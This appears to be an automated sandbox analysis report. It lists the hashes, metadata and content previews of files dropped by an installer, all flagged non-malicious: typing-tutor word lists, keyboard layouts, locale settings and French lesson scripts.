                                                          Preview: Mittellange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHT.AFFE.ALLE.ARZT.ATEM.AUCH.AULA.AUTO.BAHN.BAND.BANK.BASS.BAUM.BEIN.BERG.BETT.BILD.BISS.BLAU.BLUT.BOOT.BROT.BUCH.BURG.CENT.CHOR.DAME.DORF.DORT.DOSE.DREI.DUFT.ECHO.ECHT.ECKE.EINS.ENDE.ENTE.ERDE.ERST.ESEL.EURO.FACH.FALL.FANG.FASS.FAUL.FELD.FEST.FILM.FLUG.FOTO.FRAU.FREI.FROH.F.NF.GANS.GANZ.GAST.GELB.GELD.GIPS.GLAS.GOLD.GOTT.GRAS.GRO..GR.N.GUSS.HAAR.HAHN.HALB.HALS.HALT.HAND.HART.HASE.HAUS.HAUT.HEFT.HELL.HEMD.HERB.HERD.HERZ.HEXE.HIER.HOCH.HOSE.HUHN.HUND.IGEL.JAHR.JULI.JUNG.JUNI.KAHL.KAHN.KALK.KALT.KARO.K.SE.KEIN.KERN.KILO.KIND.KINO.KOCH.KOHL.K.LN.KOPF.KORN.KRAN.K.HL.KUSS.LAHM.LAND.LANG.L.RM.LAUT.LEER.LIED.LILA.LOCH.L.WE.LUFT.MAMA.MANN.M.RZ.MAUS.MEER.MIST.MOND.M.WE.M.LL.MUND.NAME.NASE.NASS.NEIN.NEST.NEUN.NOCH.NULL.NUSS.OBEN.OBER.OFEN.PAAR.PAPA.PARK.PASS.POPO.POST.RAND.RAUM.REDE.REIS.RIND.RING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\images\is-VKSF5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PNG image data, 300 x 200, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):1141
                                                          Entropy (8bit):6.871978008324613
                                                          Encrypted:false
                                                          SSDEEP:24:H+0a7qHaoWXZPfYw5bts9CupfTaEN1296SCGf/1:oSVyZPAw5KccTail09
                                                          MD5:30A29EB1970D70F3E7630E2F6129B623
                                                          SHA1:FE02AF80D8D9BBBC4231A1FCF3F43F105EB1AB44
                                                          SHA-256:445D653649DEFCCA4D8F72B2E91CFA5EF7C39D2EB660B23F5D45D937D4EECBA0
                                                          SHA-512:B276B3B6830CF89AE8AFF6FC451A7C6F51E2555C1FD6CC06453DD75640D91FFF24AAA8BC553172CB0CC9CCE8DDB68DEF2A85C9021B64F58A3E62FAF41E66BF92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .PNG........IHDR...,.........R..U....bKGD..............pHYs.................tIME......$........IDATx...Ok.e........=...H......Z..M..<..<...:.".."....xT,(...VK.....0.t..&...<;...<0$a.7{...<.................................................................................................pHS..VOI>.....'..d.I...`F%.^.Wk..p...*..\).v.z..*I).AI>).........ah..$%.{I..n..T...c...h..i].]..e.v..CsxEy'.$.+...X..Hh.....b.c......bQ.t.zc...u+......:...F`...n@o........b..Iv..... .....~..:7.+....X-..J{...q..Jr/.:..&.B..j.XLU..."...7..V..r..;I^H.|.'._. .In'.9...q.....$.$y6.6..I....I~..Z...6..e........$.g.v...<L.w..{....I.N.|.....i....l.>....WI.....K....E..c.|V..u...V.......\.J.MI>.}..@.cPM...\.}.............I.L.QI..p^`.A.V....SI.N.V.r..8..=.....q.l5...KI.Y.9..l|..IA5..$o..E.4..X.h.....b.Z`....0igD==.O#..A.V.J.v...u.&[..:.Y........e....Z.Vrheo...2a.....~Y.B..&...V.&..MM...i.A....[.,....z...l.fX.AX..X...6.^.:.....5.R..$...6`>k.X#g....$.-.$`N..X#g...|..R.9m.v.I.u..hv.U
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\images\map.png (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PNG image data, 300 x 200, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):1141
                                                          Entropy (8bit):6.871978008324613
                                                          Encrypted:false
                                                          SSDEEP:24:H+0a7qHaoWXZPfYw5bts9CupfTaEN1296SCGf/1:oSVyZPAw5KccTail09
                                                          MD5:30A29EB1970D70F3E7630E2F6129B623
                                                          SHA1:FE02AF80D8D9BBBC4231A1FCF3F43F105EB1AB44
                                                          SHA-256:445D653649DEFCCA4D8F72B2E91CFA5EF7C39D2EB660B23F5D45D937D4EECBA0
                                                          SHA-512:B276B3B6830CF89AE8AFF6FC451A7C6F51E2555C1FD6CC06453DD75640D91FFF24AAA8BC553172CB0CC9CCE8DDB68DEF2A85C9021B64F58A3E62FAF41E66BF92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .PNG........IHDR...,.........R..U....bKGD..............pHYs.................tIME......$........IDATx...Ok.e........=...H......Z..M..<..<...:.".."....xT,(...VK.....0.t..&...<;...<0$a.7{...<.................................................................................................pHS..VOI>.....'..d.I...`F%.^.Wk..p...*..\).v.z..*I).AI>).........ah..$%.{I..n..T...c...h..i].]..e.v..CsxEy'.$.+...X..Hh.....b.c......bQ.t.zc...u+......:...F`...n@o........b..Iv..... .....~..:7.+....X-..J{...q..Jr/.:..&.B..j.XLU..."...7..V..r..;I^H.|.'._. .In'.9...q.....$.$y6.6..I....I~..Z...6..e........$.g.v...<L.w..{....I.N.|.....i....l.>....WI.....K....E..c.|V..u...V.......\.J.MI>.}..@.cPM...\.}.............I.L.QI..p^`.A.V....SI.N.V.r..8..=.....q.l5...KI.Y.9..l|..IA5..$o..E.4..X.h.....b.Z`....0igD==.O#..A.V.J.v...u.&[..:.Y........e....Z.Vrheo...2a.....~Y.B..&...V.&..MM...i.A....[.,....z...l.fX.AX..X...6.^.:.....5.R..$...6`>k.X#g....$.-.$`N..X#g...|..R.9m.v.I.u..hv.U
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\is-KTB13.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):253
                                                          Entropy (8bit):4.581372613035101
                                                          Encrypted:false
                                                          SSDEEP:3:SEHKEtJCDEX4AjnqMGPZ5XXZgPQeSDVhjnvTdZ15pvtSgVvTWd0AqWUjXbvKG3Tr:SuFJAd5MGf+wnvVEk6ubLCG3jOQU4ylg
                                                          MD5:B10B2B44F8137740E14363E0CE4B7E47
                                                          SHA1:F13D25F608B9F73A38D0F17ED53C82D4BBDC3EB2
                                                          SHA-256:5FD920D2A0C23D4EB0D5704B676E48726A50DB7122E8ED2DBB740F2C71144822
                                                          SHA-512:0E1FB991278BA7AADEA8F2DC357D0E32CCF282FFB093AEFCD496BE7B3CA6985032C71BBE56E8CA882EC20AEACC4DC99D166CFE65BCBFB2CFE1B4CE2EB2AC9463
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for Spanish theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\is-TT7JD.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjoW6Kq:UYEFsUq
                                                          MD5:4CB8E60A5CEDCFB9E32CD29C91E4D33D
                                                          SHA1:2D3CDB0FE9A5A849749C9153BED521AEFFD42A1D
                                                          SHA-256:BAD115F66D65FE3617D43911CED596D67F4E826759E9538393A48D451350EF9A
                                                          SHA-512:2BA7665F8A9592E39D3290A5B5F79CA32F6407D1F604BD581A447F3FD1781B32586E09DEA45D14F112B24937D48E19C536C243980C985594392D55B78E6F0E4B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=es_ES.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):253
                                                          Entropy (8bit):4.581372613035101
                                                          Encrypted:false
                                                          SSDEEP:3:SEHKEtJCDEX4AjnqMGPZ5XXZgPQeSDVhjnvTdZ15pvtSgVvTWd0AqWUjXbvKG3Tr:SuFJAd5MGf+wnvVEk6ubLCG3jOQU4ylg
                                                          MD5:B10B2B44F8137740E14363E0CE4B7E47
                                                          SHA1:F13D25F608B9F73A38D0F17ED53C82D4BBDC3EB2
                                                          SHA-256:5FD920D2A0C23D4EB0D5704B676E48726A50DB7122E8ED2DBB740F2C71144822
                                                          SHA-512:0E1FB991278BA7AADEA8F2DC357D0E32CCF282FFB093AEFCD496BE7B3CA6985032C71BBE56E8CA882EC20AEACC4DC99D166CFE65BCBFB2CFE1B4CE2EB2AC9463
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for Spanish theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjoW6Kq:UYEFsUq
                                                          MD5:4CB8E60A5CEDCFB9E32CD29C91E4D33D
                                                          SHA1:2D3CDB0FE9A5A849749C9153BED521AEFFD42A1D
                                                          SHA-256:BAD115F66D65FE3617D43911CED596D67F4E826759E9538393A48D451350EF9A
                                                          SHA-512:2BA7665F8A9592E39D3290A5B5F79CA32F6407D1F604BD581A447F3FD1781B32586E09DEA45D14F112B24937D48E19C536C243980C985594392D55B78E6F0E4B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=es_ES.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\is-LGOU5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):199
                                                          Entropy (8bit):4.19721699571068
                                                          Encrypted:false
                                                          SSDEEP:6:aMAzuV9sQcamrHUoDZut5SrqaG/bqn3xon3koa:xSD8MrqaG/bcBon4
                                                          MD5:F9C58618D446E7B389FB8E02C6273040
                                                          SHA1:42DCCDD29C96F3563873C01A5F384FE8BF460AAA
                                                          SHA-256:ABBD3E51AABE561D95CA78D723C4468C97CB7163A29346D9EFAEFE74464D37DD
                                                          SHA-512:856E71FCF8935BE1518C6E9BCEB0A82E2D66BF46CA46977E2142D1DBF86532A0216D34FB79D47F0949A1F4E53298CF1AFB4E4E3BA717ED2293EF6671B1909EF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Dos..CORTA..DEBIL..PRIMO..CIGARO..LAPIZ..GUAPO..HERMOSA..NARIZ..TENGO..MUSEO..CENAR..PERRO..GATITO..MUSICA..PADRE..MEJOR..HERMANO..FACIL..CLARO..ESPEJO..LABIOS..ESCALA..FELIZ..LIBRO..SOMBRA....
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\is-P16BO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):239
                                                          Entropy (8bit):4.262434715581227
                                                          Encrypted:false
                                                          SSDEEP:6:KXz1kFyyygeqX+LzdhvV+nIr0UFq/ymomOqqQaf/IxKy:g1kFyYeqXArvUI1qdoHqqj3IxD
                                                          MD5:F8AB21CC0D2EA6ADE87FB7E1176F5EC5
                                                          SHA1:6F141FCBA7DAB4A5628BC4700BE2CB46425B8F18
                                                          SHA-256:F8D4125233FD26A293F7CC8374382B9441FF2CF9C759800387D7C1414BFBB493
                                                          SHA-512:97B0342ECAC3A7F3CB78C9A99F102710636BBD9FDA25A62A7092F1757F4B21EBEFF430550F0641D4278F967163B1CBF9D12F7D005CE6C1A1D29A49E0D6B1C8AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Tres..PELICULA..MAESTRO..TRABAJO..DIVERTIR..DESAYUNO..BOTELLA..SERVICIO..ESCUSADO..EDIFICIO..VENTANA..TELEFONO..PINTURA..LECTURA..LECCION..CABALLO..CORAZON..PENSANDO..GENERAL..CUCHARA..CUCHILLO..CEREBRO..MONTANA..ASUSTADO..PLASTICO..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\is-QCAR9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):142
                                                          Entropy (8bit):4.004587747695663
                                                          Encrypted:false
                                                          SSDEEP:3:OK+osvVxvo+i2vz3oorzgpkoT3ojyZvwtw+o8qovdTtvzdn:CvVxvor2r1rmrojyWw+dx5n
                                                          MD5:8A3514AD4F81C6B9B9B746A33A67C76F
                                                          SHA1:9FBD6B0F32DCFDD097180DC99793091B866EA443
                                                          SHA-256:996DE48B37C5AEEB01EFB32C25B8B4845507068BE844FC5E985AF3E6B67FC746
                                                          SHA-512:46A8252111AFC67E222533F8C3414F227F6E960A76E7ADFD8E3788C3CAB2C667D3D2AD9E60C73C09EBE564BDD2B39C8265FC5257A379288A652658C5FFBD5344
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Uno..PAN..PEZ..HORA..MALO..PAPA..SED..SECA..AGUA..DEDO..OLA..HOLA..MIO..DIA..FEO..TIA..PIE..UNA..UNO..OJO..BOCA..CARA..MANO..REY..BEBE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\words1.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):142
                                                          Entropy (8bit):4.004587747695663
                                                          Encrypted:false
                                                          SSDEEP:3:OK+osvVxvo+i2vz3oorzgpkoT3ojyZvwtw+o8qovdTtvzdn:CvVxvor2r1rmrojyWw+dx5n
                                                          MD5:8A3514AD4F81C6B9B9B746A33A67C76F
                                                          SHA1:9FBD6B0F32DCFDD097180DC99793091B866EA443
                                                          SHA-256:996DE48B37C5AEEB01EFB32C25B8B4845507068BE844FC5E985AF3E6B67FC746
                                                          SHA-512:46A8252111AFC67E222533F8C3414F227F6E960A76E7ADFD8E3788C3CAB2C667D3D2AD9E60C73C09EBE564BDD2B39C8265FC5257A379288A652658C5FFBD5344
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Uno..PAN..PEZ..HORA..MALO..PAPA..SED..SECA..AGUA..DEDO..OLA..HOLA..MIO..DIA..FEO..TIA..PIE..UNA..UNO..OJO..BOCA..CARA..MANO..REY..BEBE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\words2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):199
                                                          Entropy (8bit):4.19721699571068
                                                          Encrypted:false
                                                          SSDEEP:6:aMAzuV9sQcamrHUoDZut5SrqaG/bqn3xon3koa:xSD8MrqaG/bcBon4
                                                          MD5:F9C58618D446E7B389FB8E02C6273040
                                                          SHA1:42DCCDD29C96F3563873C01A5F384FE8BF460AAA
                                                          SHA-256:ABBD3E51AABE561D95CA78D723C4468C97CB7163A29346D9EFAEFE74464D37DD
                                                          SHA-512:856E71FCF8935BE1518C6E9BCEB0A82E2D66BF46CA46977E2142D1DBF86532A0216D34FB79D47F0949A1F4E53298CF1AFB4E4E3BA717ED2293EF6671B1909EF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Dos..CORTA..DEBIL..PRIMO..CIGARO..LAPIZ..GUAPO..HERMOSA..NARIZ..TENGO..MUSEO..CENAR..PERRO..GATITO..MUSICA..PADRE..MEJOR..HERMANO..FACIL..CLARO..ESPEJO..LABIOS..ESCALA..FELIZ..LIBRO..SOMBRA....
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\words3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):239
                                                          Entropy (8bit):4.262434715581227
                                                          Encrypted:false
                                                          SSDEEP:6:KXz1kFyyygeqX+LzdhvV+nIr0UFq/ymomOqqQaf/IxKy:g1kFyYeqXArvUI1qdoHqqj3IxD
                                                          MD5:F8AB21CC0D2EA6ADE87FB7E1176F5EC5
                                                          SHA1:6F141FCBA7DAB4A5628BC4700BE2CB46425B8F18
                                                          SHA-256:F8D4125233FD26A293F7CC8374382B9441FF2CF9C759800387D7C1414BFBB493
                                                          SHA-512:97B0342ECAC3A7F3CB78C9A99F102710636BBD9FDA25A62A7092F1757F4B21EBEFF430550F0641D4278F967163B1CBF9D12F7D005CE6C1A1D29A49E0D6B1C8AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Tres..PELICULA..MAESTRO..TRABAJO..DIVERTIR..DESAYUNO..BOTELLA..SERVICIO..ESCUSADO..EDIFICIO..VENTANA..TELEFONO..PINTURA..LECTURA..LECCION..CABALLO..CORAZON..PENSANDO..GENERAL..CUCHARA..CUCHILLO..CEREBRO..MONTANA..ASUSTADO..PLASTICO..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\is-83OPV.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):29
                                                          Entropy (8bit):4.073329701949522
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjrY+t:UYEFV
                                                          MD5:4C5EF6C036E9E5D3D858F64F08A0E3BD
                                                          SHA1:2622BA2140891F0DBA0D79486F098CE998389CD5
                                                          SHA-256:4A3B872870116053BC40A3D552D6113EAA3C050A2D0856B0C2F86B879E0CF153
                                                          SHA-512:CD87F5684FA899C429220FCCDBF0C58A353A02C0E8131443D1A3C916FD609365D3CD16724FC9CC510568C0760EAAAA21AB6305D982C9E5F546225DFD2A91D7E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=fr_FR.utf8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\is-FTKBT.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):314
                                                          Entropy (8bit):4.484097721342558
                                                          Encrypted:false
                                                          SSDEEP:6:SEhOCCAJAVohGf+wnvVEk6ubLCG3jOQU4yBKqWm8YzaYUw:pOC/aih7qvVR+aOeC8Ud
                                                          MD5:981B6C37967966F0BD3B7395C0304F30
                                                          SHA1:4BFBE224C64178C33DFA435612E0916CA49962A7
                                                          SHA-256:C844B1474570FB7AF91B16614801168A6B14CB8883DBB4A59C107F2925A2DB4D
                                                          SHA-512:96E8E59C53B4326898A8C45C467636805BED13C41318FEB3AE3AE8B8780DF77177425A9C0DF2A83D7795E70135A4AEBFF5BE13DBA36274CB57978B79BC773198
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # Default (English) keyboard.lst file.0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.5| .0|!.0|@.0|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..9|;.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):314
                                                          Entropy (8bit):4.484097721342558
                                                          Encrypted:false
                                                          SSDEEP:6:SEhOCCAJAVohGf+wnvVEk6ubLCG3jOQU4yBKqWm8YzaYUw:pOC/aih7qvVR+aOeC8Ud
                                                          MD5:981B6C37967966F0BD3B7395C0304F30
                                                          SHA1:4BFBE224C64178C33DFA435612E0916CA49962A7
                                                          SHA-256:C844B1474570FB7AF91B16614801168A6B14CB8883DBB4A59C107F2925A2DB4D
                                                          SHA-512:96E8E59C53B4326898A8C45C467636805BED13C41318FEB3AE3AE8B8780DF77177425A9C0DF2A83D7795E70135A4AEBFF5BE13DBA36274CB57978B79BC773198
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # Default (English) keyboard.lst file.0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.5| .0|!.0|@.0|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..9|;.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\is-SL6OD.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1384
                                                          Entropy (8bit):5.110067590881047
                                                          Encrypted:false
                                                          SSDEEP:24:bGGlb7v7v7gd6Ghbb7qMUHG2UHG9TM4UHQSM4UHQSM4UHQalxGrf7QIJbnc97neb:9lfzz0hbfJ2VM9HhM9HhM9HPlxGrzQIb
                                                          MD5:3F0FB8747E3F0520746AC7A192ADCFCA
                                                          SHA1:10225AA8C67C4D35583C65B9347CF49A54A37994
                                                          SHA-256:484CA3EA97B87B0D6DD6983C19BA5E28FA365B5D4BA6B16A2B03706861BDBB78
                                                          SHA-512:22F318C178DC92FB48D4353C22CE12B4CBAEF24569822E2BB78F787927F3298F2648D8275C4F1F91297EF957D83ED9935A2CBC19B0A24E40FB0C24E82E1A83D2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">..<page title="Introduction to Example Lesson">...<text align="center">Les mois de l'ann.e</text>...<text align="center"> </text>...<text align="center"> </text>...<text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>...<waitforinput/>..</page>..<page title="The a Key" bgcolor="#3f7f3f">...<img src="/keyboard/keyboard-us.png" x="45" y="220"/>...<text align="center">Les mois de l'ann.e</text>...<text align="center">To start practicing hit the p key</text>...<text color="#000000" x="100" y="273">A</text>...<text color="#000000" x="130" y="273">S</text>...<waitforchar/>...<prac>janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre</prac>..</page>.. HACK: there is some undesired behavior in scripting.c, this fixes it
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\is-TFF2G.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1406
                                                          Entropy (8bit):4.749083233063025
                                                          Encrypted:false
                                                          SSDEEP:24:bGGTdNUnfgiV7GbNUXqbHGtHGk6rrrL9lxZf7jJbdteneiXB9f:9Td+nfnVCb+X50frrrL9lxZzjJrenZBp
                                                          MD5:EE7088A04B51A20BC21DB311B2F80ABC
                                                          SHA1:AC8D413B24D1401C7D23083C5CA5BAE1AF69BCD8
                                                          SHA-256:0B5271F60333791B776E16C321950E7E9010A4F9AD9D5CDFE7685668E5BB0334
                                                          SHA-512:8DC21B2B77B1F99C17BF967CC21C822247B1B0F70F635F24A942DABAB4B5B7B09E34EE3CF7B5831D949EB1933AF26EFD4492E6210F744856FBD2AE2127F521BD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">. <page title="Introduction to Example Lesson">.. <text align="center">Les jours de la semaine</text>.. <text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>. <waitforinput/>. </page>. <page title="The a Key" bgcolor="#3f7f3f">. <img src="/keyboard/keyboard-us.png" x="45" y="220"/>. <text align="center">Les jours de la semaine</text>. <text align="center">To start practicing hit the p key</text>. <text color="#000000" x="100" y="273">A</text>. <text color="#000000" x="130" y="273">S</text>. <waitforchar/>. <prac>lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche</prac>. </page>. HACK: there is some undesired behavior in scripting.c, this fixes it for now-->. <page>. </page>
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\les_jours_de_la_semaine.xml (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1406
                                                          Entropy (8bit):4.749083233063025
                                                          Encrypted:false
                                                          SSDEEP:24:bGGTdNUnfgiV7GbNUXqbHGtHGk6rrrL9lxZf7jJbdteneiXB9f:9Td+nfnVCb+X50frrrL9lxZzjJrenZBp
                                                          MD5:EE7088A04B51A20BC21DB311B2F80ABC
                                                          SHA1:AC8D413B24D1401C7D23083C5CA5BAE1AF69BCD8
                                                          SHA-256:0B5271F60333791B776E16C321950E7E9010A4F9AD9D5CDFE7685668E5BB0334
                                                          SHA-512:8DC21B2B77B1F99C17BF967CC21C822247B1B0F70F635F24A942DABAB4B5B7B09E34EE3CF7B5831D949EB1933AF26EFD4492E6210F744856FBD2AE2127F521BD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">. <page title="Introduction to Example Lesson">.. <text align="center">Les jours de la semaine</text>.. <text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>. <waitforinput/>. </page>. <page title="The a Key" bgcolor="#3f7f3f">. <img src="/keyboard/keyboard-us.png" x="45" y="220"/>. <text align="center">Les jours de la semaine</text>. <text align="center">To start practicing hit the p key</text>. <text color="#000000" x="100" y="273">A</text>. <text color="#000000" x="130" y="273">S</text>. <waitforchar/>. <prac>lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche</prac>. </page>. HACK: there is some undesired behavior in scripting.c, this fixes it for now-->. <page>. </page>
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\les_mois_de_l_annee.xml (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1384
                                                          Entropy (8bit):5.110067590881047
                                                          Encrypted:false
                                                          SSDEEP:24:bGGlb7v7v7gd6Ghbb7qMUHG2UHG9TM4UHQSM4UHQSM4UHQalxGrf7QIJbnc97neb:9lfzz0hbfJ2VM9HhM9HhM9HPlxGrzQIb
                                                          MD5:3F0FB8747E3F0520746AC7A192ADCFCA
                                                          SHA1:10225AA8C67C4D35583C65B9347CF49A54A37994
                                                          SHA-256:484CA3EA97B87B0D6DD6983C19BA5E28FA365B5D4BA6B16A2B03706861BDBB78
                                                          SHA-512:22F318C178DC92FB48D4353C22CE12B4CBAEF24569822E2BB78F787927F3298F2648D8275C4F1F91297EF957D83ED9935A2CBC19B0A24E40FB0C24E82E1A83D2
                                                          Malicious:false
                                                          Reputation:unknown
